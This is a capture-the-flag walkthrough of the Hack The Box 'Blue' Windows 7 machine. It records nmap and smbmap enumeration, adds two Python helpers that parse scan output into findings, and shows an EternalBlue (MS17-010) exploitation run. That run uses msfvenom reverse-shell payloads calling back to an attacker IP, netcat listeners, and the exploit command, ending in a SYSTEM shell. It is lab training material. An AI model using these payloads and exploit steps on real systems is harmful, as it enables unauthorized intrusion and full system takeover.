HTB - Blue

About the Box:

OS Name:        Microsoft Windows 7 Professional
OS Version:     6.1.7601 Service Pack 1 Build 7601
IP:             10.10.10.40
Arch:           x64-based PC
Difficulty:     Easy

Getting Root:

  1. Discovered that the SMB ports are open

  2. Checked for SMB vulnerabilities and found the host vulnerable to MS17-010

  3. Used a Python exploit from GitHub

  4. Got a shell with SYSTEM privileges

Nmap

Quick scan

# nmap 10.10.10.40

Host is up (0.045s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown

Enumerating versions and running the default scripts

# Command
nmap -Pn -sC -sV -p 135,139,445,49152,49153,49154,49155,49156,49157 -oN Blue_nmap.txt 10.10.10.40

# Results
Nmap scan report for 10.10.10.40
Host is up (0.046s latency).

PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)  
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 53s, deviation: 0s, median: 52s
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-01-20T17:22:24+00:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-01-20T17:22:26
|_  start_date: 2020-01-19T23:53:17

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jan 20 12:21:39 2020 -- 1 IP address (1 host up) scanned in 69.89 seconds
 

Nmap - smb vuln script

Nmap shows the target is vulnerable to MS17-010

root@kdeali:~/HackTheBox/Blue# nmap --script vuln -p 139,445  10.10.10.40
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-07 17:17 EST
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.40
Host is up (0.045s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp open  microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/  
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap done: 1 IP address (1 host up) scanned in 51.69 seconds
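The two scans above are the evidence worth keeping from this phase. As an added example (not code from the original write-up), the Python helper below parses nmap's normal output for the SMB host-script results and turns the message-signing settings and any smb-vuln-* state into findings a defender can act on; the embedded samples are excerpts of the scans shown above.

```python
import re

# Excerpts of the two nmap runs above (host-script sections only).
NMAP_SC_OUTPUT = """\
Host script results:
|_clock-skew: mean: 53s, deviation: 0s, median: 52s
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
"""

NMAP_VULN_OUTPUT = """\
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|
|_    Disclosure date: 2017-03-14
"""


def parse_host_scripts(text):
    """Return {script_name: [body lines]} from the 'Host script results:' block.
    nmap prefixes every script line with '| ' (or '|_' on the last line); a script
    header has no further indentation, its body lines are indented."""
    scripts, current, in_block = {}, None, False
    for line in text.splitlines():
        if line.startswith("Host script results:"):
            in_block = True
            continue
        if not in_block:
            continue
        if not line.startswith("|"):
            break                      # first non-script line ends the block
        body = line[2:]                # drop '|' plus the following ' ' or '_'
        if not body.strip():
            continue                   # bare '|' spacer line
        if body[0] != " ":             # no indent: a new script header
            name, _, rest = body.partition(":")
            current = name.strip()
            scripts[current] = [rest.strip()] if rest.strip() else []
        elif current is not None:
            scripts[current].append(body.strip())
    return scripts


def smb_findings(scripts):
    """Turn parsed SMB script results into (severity, description) findings."""
    findings = []
    for entry in scripts.get("smb-security-mode", []):
        if entry == "account_used: guest":
            findings.append(("MEDIUM", "server granted a guest SMB session"))
        if entry.startswith("message_signing:") and "disabled" in entry:
            findings.append(("HIGH", "SMBv1 message signing disabled (relay/tamper risk)"))
    for entry in scripts.get("smb2-security-mode", []):
        if "not required" in entry.lower():
            findings.append(("MEDIUM", "SMB2 message signing not required"))
    for name, entries in scripts.items():
        if not name.startswith("smb-vuln-"):
            continue
        state = next((e.partition(":")[2].strip() for e in entries
                      if e.startswith("State:")), "")
        if "VULNERABLE" in state and not state.startswith("NOT"):
            cves = [c for e in entries if e.startswith("IDs:")
                    for c in re.findall(r"CVE-\d{4}-\d+", e)]
            findings.append(("CRITICAL", f"{name}: {state} ({', '.join(cves) or 'no CVE'})"))
    return findings


if __name__ == "__main__":
    for output in (NMAP_SC_OUTPUT, NMAP_VULN_OUTPUT):
        for severity, text in smb_findings(parse_host_scripts(output)):
            print(f"[{severity}] {text}")
```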

smbmap

Checking SMB shares without a username, we get nothing

root@kdeali:~/HackTheBox/Blue# smbmap -H 10.10.10.40
[+] Finding open SMB ports....
[+] User SMB session established on 10.10.10.40...
[+] IP: 10.10.10.40:445 Name: 10.10.10.40
        Disk                                                    Permissions     Comment   
        ----                                                    -----------     -------
[!] Access Denied

Checking SMB shares while specifying a username (I used "nobody12"), we get something

root@kdeali:~/HackTheBox/Blue# smbmap -H 10.10.10.40 -u "nobody12"
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.40...
[+] IP: 10.10.10.40:445 Name: 10.10.10.40
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share  
        IPC$                                                    NO ACCESS       Remote IPC
        .
        dr--r--r--                0 Fri Jul 21 02:44:22 2017    .
        dr--r--r--                0 Fri Jul 21 02:44:22 2017    ..
        Share                                                   READ ONLY
        .
        dw--w--w--                0 Fri Jul 21 02:56:23 2017    .
        dw--w--w--                0 Fri Jul 21 02:56:23 2017    ..
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Default
        fr--r--r--              174 Fri Jul 14 18:32:23 2017    desktop.ini
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    Public
        Users                                                   READ ONLY

The same results can be obtained by using -u " " (I prefer to specify a user)

root@kdeali:~/HackTheBox/Blue# smbmap -H 10.10.10.40 -u " "
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.40...
[+] IP: 10.10.10.40:445 Name: 10.10.10.40
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share  
        IPC$                                                    NO ACCESS       Remote IPC
        .
        dr--r--r--                0 Fri Jul 21 02:44:22 2017    .
        dr--r--r--                0 Fri Jul 21 02:44:22 2017    ..
        Share                                                   READ ONLY
        .
        dw--w--w--                0 Fri Jul 21 02:56:23 2017    .
        dw--w--w--                0 Fri Jul 21 02:56:23 2017    ..
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Default
        fr--r--r--              174 Fri Jul 14 18:32:23 2017    desktop.ini
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    Public
        Users                                                   READ ONLY

Listing the shares recursively with -R to look for interesting files we can read.

root@kdeali:~/HackTheBox/Blue# smbmap -H 10.10.10.40 -u "nobody12" -R
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.40...
[+] IP: 10.10.10.40:445 Name: 10.10.10.40
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        .
        dr--r--r--                0 Fri Jul 21 02:44:22 2017    .
        dr--r--r--                0 Fri Jul 21 02:44:22 2017    ..
        Share                                                   READ ONLY
        .\
        .
        dw--w--w--                0 Fri Jul 21 02:56:23 2017    .
        dw--w--w--                0 Fri Jul 21 02:56:23 2017    ..
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Default
        fr--r--r--              174 Fri Jul 14 18:32:23 2017    desktop.ini
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    Public
        Users                                                   READ ONLY
        .\
        dw--w--w--                0 Fri Jul 21 02:56:23 2017    .
        dw--w--w--                0 Fri Jul 21 02:56:23 2017    ..
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Default
        -r--r--r--              174 Fri Jul 14 18:32:23 2017    desktop.ini
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    Public
        .\Default\
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    .
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    ..
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    AppData
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Desktop
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Documents
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Downloads
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Favorites
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Links
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Music
        -r--r--r--           262144 Sun Jul 16 16:22:24 2017    NTUSER.DAT
        -r--r--r--             1024 Fri Jul 14 18:32:24 2017    NTUSER.DAT.LOG
        -r--r--r--           189440 Sun Jul 16 16:22:24 2017    NTUSER.DAT.LOG1
        -r--r--r--                0 Fri Jul 14 18:37:45 2017    NTUSER.DAT.LOG2
        -r--r--r--            65536 Fri Jul 14 18:32:24 2017    NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
        -r--r--r--           524288 Fri Jul 14 18:32:24 2017    NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms  
        -r--r--r--           524288 Fri Jul 14 18:32:23 2017    NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Pictures
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    Saved Games
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Videos
        .\Default\AppData\
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    .
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    ..
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    Local
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    Roaming
        .\Default\AppData\Local\
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    .
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    ..
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    Microsoft
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    Temp
        .\Default\AppData\Local\Microsoft\
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    .
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    ..
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    Windows
        .\Default\AppData\Local\Microsoft\Windows\
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    .
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    ..
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    GameExplorer
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    History
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    Temporary Internet Files
        .\Default\AppData\Roaming\
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    .
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    ..
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    Media Center Programs
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    Microsoft
        .\Default\AppData\Roaming\Microsoft\
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    .
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    ..
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    Internet Explorer
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    Windows
        .\Default\AppData\Roaming\Microsoft\Internet Explorer\
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    .
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    ..
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Quick Launch
        .\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    .
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    ..
        -r--r--r--              146 Fri Jul 14 18:32:24 2017    desktop.ini
        -r--r--r--              290 Fri Jul 14 18:32:24 2017    Shows Desktop.lnk
        -r--r--r--              272 Fri Jul 14 18:32:24 2017    Window Switcher.lnk
        .\Default\AppData\Roaming\Microsoft\Windows\
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    .
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    ..
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    Cookies
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    Network Shortcuts
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    Printer Shortcuts
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Recent
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    SendTo
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Start Menu
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    Templates
        .\Default\AppData\Roaming\Microsoft\Windows\SendTo\
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    .
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    ..
        -r--r--r--                3 Fri Jul 14 18:32:24 2017    Compressed (zipped) Folder.ZFSendToTarget
        -r--r--r--                7 Fri Jul 14 18:32:24 2017    Desktop (create shortcut).DeskLink
        -r--r--r--              558 Fri Jul 14 18:32:24 2017    Desktop.ini
        -r--r--r--             1238 Fri Jul 14 18:32:24 2017    Fax Recipient.lnk
        -r--r--r--                4 Fri Jul 14 18:32:24 2017    Mail Recipient.MAPIMail
        .\Default\AppData\Roaming\Microsoft\Windows\Start Menu\
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    .
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    ..
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    Programs
        .\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    .
        dr--r--r--                0 Fri Jul 14 18:37:45 2017    ..
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Accessories
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Maintenance
        .\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    .
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    ..
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Accessibility
        -r--r--r--             1280 Fri Jul 14 18:32:24 2017    Command Prompt.lnk
        -r--r--r--              678 Fri Jul 14 18:32:24 2017    Desktop.ini
        -r--r--r--             1304 Fri Jul 14 18:32:24 2017    Notepad.lnk
        -r--r--r--              262 Fri Jul 14 18:32:24 2017    Run.lnk
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    System Tools
        -r--r--r--             1228 Fri Jul 14 18:32:24 2017    Windows Explorer.lnk
        .\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    .
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    ..
        -r--r--r--              704 Fri Jul 14 18:32:24 2017    Desktop.ini
        -r--r--r--             1358 Fri Jul 14 18:32:24 2017    Ease of Access.lnk
        -r--r--r--             1258 Fri Jul 14 18:32:24 2017    Magnify.lnk
        -r--r--r--             1262 Fri Jul 14 18:32:24 2017    Narrator.lnk
        -r--r--r--             1250 Fri Jul 14 18:32:24 2017    On-Screen Keyboard.lnk
        .\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    .
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    ..
        -r--r--r--              262 Fri Jul 14 18:32:24 2017    computer.lnk
        -r--r--r--              262 Fri Jul 14 18:32:24 2017    Control Panel.lnk
        -r--r--r--              592 Fri Jul 14 18:32:24 2017    Desktop.ini
        -r--r--r--             1306 Fri Jul 14 18:32:24 2017    Private Character Editor.lnk
        .\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    .
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    ..
        -r--r--r--              318 Fri Jul 14 18:32:24 2017    Desktop.ini
        -r--r--r--              262 Fri Jul 14 18:32:24 2017    Help.lnk
        .\Public\
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    .
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    ..
        -r--r--r--              174 Fri Jul 21 02:40:38 2017    desktop.ini
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    Documents
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    Downloads
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    Favorites
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    Libraries
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    Music
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    Pictures
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    Recorded TV
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    Videos
        .\Public\Documents\
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    .
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    ..
        -r--r--r--              278 Fri Jul 21 02:40:38 2017    desktop.ini
        .\Public\Downloads\
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    .
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    ..
        -r--r--r--              174 Fri Jul 21 02:40:38 2017    desktop.ini
        .\Public\Libraries\
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    .
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    ..
        -r--r--r--               88 Fri Jul 21 02:40:38 2017    desktop.ini
        -r--r--r--              876 Fri Jul 21 02:40:38 2017    RecordedTV.library-ms
        .\Public\Music\
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    .
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    ..
        -r--r--r--              380 Fri Jul 21 02:40:38 2017    desktop.ini
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    Sample Music
        .\Public\Music\Sample Music\
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    .
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    ..
        -r--r--r--              586 Fri Jul 21 02:40:38 2017    desktop.ini
        -r--r--r--          8414449 Fri Jul 21 02:40:38 2017    Kalimba.mp3
        -r--r--r--          4113874 Fri Jul 21 02:40:38 2017    Maid with the Flaxen Hair.mp3
        -r--r--r--          4842585 Fri Jul 21 02:40:38 2017    Sleep Away.mp3
        .\Public\Pictures\
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    .
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    ..
        -r--r--r--              380 Fri Jul 21 02:40:38 2017    desktop.ini
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    Sample Pictures
        .\Public\Pictures\Sample Pictures\
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    .
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    ..
        -r--r--r--           879394 Fri Jul 21 02:40:38 2017    Chrysanthemum.jpg
        -r--r--r--           845941 Fri Jul 21 02:40:38 2017    Desert.jpg
        -r--r--r--             1120 Fri Jul 21 02:40:38 2017    desktop.ini
        -r--r--r--           595284 Fri Jul 21 02:40:38 2017    Hydrangeas.jpg
        -r--r--r--           775702 Fri Jul 21 02:40:38 2017    Jellyfish.jpg
        -r--r--r--           780831 Fri Jul 21 02:40:38 2017    Koala.jpg
        -r--r--r--           561276 Fri Jul 21 02:40:38 2017    Lighthouse.jpg
        -r--r--r--           777835 Fri Jul 21 02:40:38 2017    Penguins.jpg
        -r--r--r--           620888 Fri Jul 21 02:40:38 2017    Tulips.jpg
        .\Public\Recorded TV\
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    .
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    ..
        -r--r--r--               80 Fri Jul 21 02:40:38 2017    desktop.ini
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    Sample Media
        .\Public\Recorded TV\Sample Media\
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    .
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    ..
        -r--r--r--              171 Fri Jul 21 02:40:38 2017    desktop.ini
        -r--r--r--          9699328 Fri Jul 21 02:40:38 2017    win7_scenic-demoshort_raw.wtv
        .\Public\Videos\
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    .
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    ..
        -r--r--r--              380 Fri Jul 21 02:40:38 2017    desktop.ini
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    Sample Videos
        .\Public\Videos\Sample Videos\
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    .
        dw--w--w--                0 Fri Jul 21 02:40:38 2017    ..
        -r--r--r--              326 Fri Jul 21 02:40:38 2017    desktop.ini
        -r--r--r--         26246026 Fri Jul 21 02:40:38 2017    Wildlife.wmv
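To turn a run like the one above into something a defender can act on, here is an added Python helper (not part of this write-up, and not smbmap's own code) that summarises smbmap output: which session type was established, each share's permissions, and the files a guest session could read. The embedded sample is a shortened excerpt constructed from the -R listing above.

```python
import re

# Shortened excerpt constructed from the "smbmap -R" run above.
SMBMAP_OUTPUT = r"""
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.40...
[+] IP: 10.10.10.40:445 Name: 10.10.10.40
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        Share                                                   READ ONLY
        .\
        dr--r--r--                0 Fri Jul 21 02:44:22 2017    .
        dr--r--r--                0 Fri Jul 21 02:44:22 2017    ..
        Users                                                   READ ONLY
        .\
        dw--w--w--                0 Fri Jul 21 02:56:23 2017    .
        dw--w--w--                0 Fri Jul 14 18:37:45 2017    Default
        fr--r--r--              174 Fri Jul 14 18:32:23 2017    desktop.ini
        .\Default\
        -r--r--r--           262144 Sun Jul 16 16:22:24 2017    NTUSER.DAT
        -r--r--r--             1024 Fri Jul 14 18:32:24 2017    NTUSER.DAT.LOG
        .\Public\Music\Sample Music\
        -r--r--r--          8414449 Fri Jul 21 02:40:38 2017    Kalimba.mp3
"""

SESSION_RE = re.compile(r"^\[\+\] (\w+) SMB session established")
SHARE_RE = re.compile(r"^\s+(\S+)\s{2,}(NO ACCESS|READ ONLY|READ, WRITE|WRITE ONLY)\s*(.*)$")
DIR_RE = re.compile(r"^\s+(\.\\[^\n]*)$")          # '.\' or '.\sub\dir\' folder header
ENTRY_RE = re.compile(r"^\s+([df-][rw-]{9})\s+(\d+)\s+\w{3} \w{3} +\d+ [\d:]+ \d{4}\s+(.*)$")


def parse_smbmap(text):
    """Return (session_type, {share: {"perm", "comment", "files": [(path, size)]}})."""
    session, shares, share, folder = "unknown", {}, None, "."
    for line in text.splitlines():
        if m := SESSION_RE.match(line):
            session = m.group(1).lower()            # e.g. "guest" or "user"
        elif m := SHARE_RE.match(line):
            share = m.group(1)
            shares[share] = {"perm": m.group(2), "comment": m.group(3).strip(), "files": []}
            folder = "."
        elif m := DIR_RE.match(line):
            folder = m.group(1).rstrip("\\")        # listing moved into a sub-folder
        elif (m := ENTRY_RE.match(line)) and share:
            mode, size, name = m.group(1), int(m.group(2)), m.group(3).strip()
            if mode[0] != "d" and mode[1] == "r":   # readable file, not a directory
                shares[share]["files"].append((f"{folder}\\{name}", size))
    return session, shares


def guest_exposure(session, shares):
    """Shares reachable over a guest session: (name, perm, file count, bytes readable)."""
    if session != "guest":
        return []
    return [(name, info["perm"], len(info["files"]), sum(s for _, s in info["files"]))
            for name, info in shares.items() if info["perm"] != "NO ACCESS"]


if __name__ == "__main__":
    session, shares = parse_smbmap(SMBMAP_OUTPUT)
    for name, perm, count, size in guest_exposure(session, shares):
        print(f"{name}: {perm}, {count} readable files, {size} bytes")
```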

Exploiting - MS17-010 Manually

Github: https://github.com/3ndG4me/AutoBlue-MS17-010

Run the shell_prep.sh script and it will generate the payloads for x86 and x64

root@kdeali:/opt/AutoBlue-MS17-010/shellcode# ./shell_prep.sh
                 _.-;;-._
          '-..-'|   ||   |
          '-..-'|_.-;;-._|
          '-..-'|   ||   |
          '-..-'|_.-''-._|
Eternal Blue Windows Shellcode Compiler

Let's compile them windoos shellcodezzz

Compiling x64 kernel shellcode
Compiling x86 kernel shellcode
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
Y
LHOST for reverse connection:
10.10.14.19
LPORT you want x64 to listen on:
8123
LPORT you want x86 to listen on:
8124
Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell
1
Type 0 to generate a staged payload or 1 to generate a stageless payload
1
Generating x64 cmd shell (stageless)...

msfvenom -p windows/x64/shell_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=10.10.14.19 LPORT=8123    
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 460 bytes
Saved as: sc_x64_msf.bin

Generating x86 cmd shell (stageless)...

msfvenom -p windows/shell_reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=10.10.14.19 LPORT=8124
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Saved as: sc_x86_msf.bin

MERGING SHELLCODE WOOOO!!!
DONE
root@kdeali:/opt/AutoBlue-MS17-010/shellcode#


# These are the files generated
root@kdeali:/opt/AutoBlue-MS17-010/shellcode# ls -l
total 80
-rw-r--r-- 1 root root 20305 Jan  8 14:39 eternalblue_kshellcode_x64.asm
-rw-r--r-- 1 root root 19862 Jan  8 14:39 eternalblue_kshellcode_x86.asm
-rw-r--r-- 1 root root  1589 Jan  8 14:39 eternalblue_sc_merge.py
-rw-r--r-- 1 root root  2203 Feb  7 17:27 sc_all.bin
-rw-r--r-- 1 root root  1232 Feb  7 17:27 sc_x64.bin
-rw-r--r-- 1 root root   772 Feb  7 17:26 sc_x64_kernel.bin
-rw-r--r-- 1 root root   460 Feb  7 17:27 sc_x64_msf.bin
-rw-r--r-- 1 root root   962 Feb  7 17:27 sc_x86.bin
-rw-r--r-- 1 root root   638 Feb  7 17:26 sc_x86_kernel.bin
-rw-r--r-- 1 root root   324 Feb  7 17:27 sc_x86_msf.bin
-rwxr-xr-x 1 root root  4556 Jan  8 14:39 shell_prep.sh


# The sc_all.bin is the file you need!!!

Start the listener

# Port to get a shell if the target is x64 (LPORT 8123 was chosen for x64 above)
nc -lnvp 8123

and

# Port to get a shell if the target is x86 (LPORT 8124 was chosen for x86 above)
nc -lnvp 8124

Execute the exploit

# Run it without arguments to see the usage:
root@kdeali:/opt/AutoBlue-MS17-010# python eternalblue_exploit7.py
eternalblue_exploit7.py <ip> <shellcode_file> [numGroomConn]

# Execute the exploit
root@kdeali:/opt/AutoBlue-MS17-010# python eternalblue_exploit7.py 10.10.10.40 shellcode/sc_all.bin   
shellcode size: 2203
numGroomConn: 13
Target OS: Windows 7 Professional 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done

We got a shell with system privileges

root@kdeali:~/HackTheBox/Blue# nc -lnvp 8123
listening on [any] 8123 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.10.40] 49158
Microsoft Windows [Version 6.1.7601]
